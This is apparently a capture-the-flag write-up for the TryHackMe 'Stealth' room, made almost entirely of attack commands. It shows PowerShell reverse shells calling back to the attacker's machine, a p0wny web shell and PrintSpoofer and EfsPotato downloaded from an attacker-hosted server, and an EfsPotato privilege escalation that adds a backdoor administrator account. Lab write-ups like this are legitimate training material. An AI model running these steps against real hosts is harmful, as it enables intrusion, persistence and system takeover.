Room Link: https://tryhackme.com/r/room/stealth
Scans
Initial scan
Kali
Longer scan
Kali
Copy nmap -sV -sT -O -p 1-65535 $VICTIM TCP/8000 - HTTPS
Kali
TCP/8080 - HTTPS
Initial Shell
Kali
Shell #1 attempt
This shell didn't work
Kali
Copy git clone https://github.com/samratashok/nishang.git
cd nishang/Shells/
subl Invoke-PowerShellTcp.ps1 Kali(subl)
Copy Invoke-PowerShellTcp -Reverse -IPAddress $KALI -Port 4444 Shell #2 attempt
This shell worked
Kali
Copy git clone https://github.com/martinsohn/PowerShell-reverse-shell.git
cd PowerShell-reverse-shell/
subl powershell-reverse-shell.ps1 Change this line to Kali IP
Kali(subl)
Copy Net.Sockets.TCPClient('$KALI', 4444) Victim
Copy cd C:\Users\evader\Desktop
dir
type encodedflag Kali
Copy echo WW91IGNhbiBnZXQgdGhlIGZsYWcgYnkgdmlzaXRpbmcgdGhlIGxpbmsgaHR0cDovLzxJUF9PRl9USElTX1BDPjo4MDAwL2FzZGFzZGFkYXNkamFramRuc2Rmc2Rmcy5waHA= | base64 --decode Victim
Copy cd C:\xampp\htdocs\uploads
del log.txt refresh the page and we can see the flag now.
Lateral Movement
Going by privs we don't have much but since we have web I tried adding a new shell and seeing if we get anything from it.
Victim
Kali
Copy git clone https://github.com/flozz/p0wny-shell.git
cd p0wny-shell/
python2 -m SimpleHTTPServer 82 Victim
Copy cd C:\xampp\htdocs
iwr -uri "http://$KALI:82/shell.php" -o shell.php Even though we're the same user this shell has SeImpersonatePrivilege enabled
Privilege Escalation
I tried printspoofer but I couldn't execute the exe.
Attempt #1
Kali
Copy git clone https://github.com/dievus/printspoofer
cd printspoofer/
python2 -m SimpleHTTPServer 82 Victim
Copy cd C:\Users\evader\Desktop
iwr -uri "http://$KALI:82/PrintSpoofer.exe" -o PrintSpoofer.exe
PrintSpoofer.exe -i -c whoami Attempt #2
We can see a EFI folder so looks like a clue on what to do.
Victim
Kali
Copy git clone https://github.com/zcgonvh/EfsPotato.git
cd EfsPotato/
python2 -m SimpleHTTPServer 82 Victim
Copy iwr -uri "http://10.10.252.180:82/EfsPotato.cs" -o efs.cs Victim(p0wny-shell)
Copy C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe efs.cs -nowarn:1691,618
efs.exe "cmd.exe /c net user user password@123 /add && net localgroup administrators user /add" Kali
Copy remmina
Username: user
Password: password@123
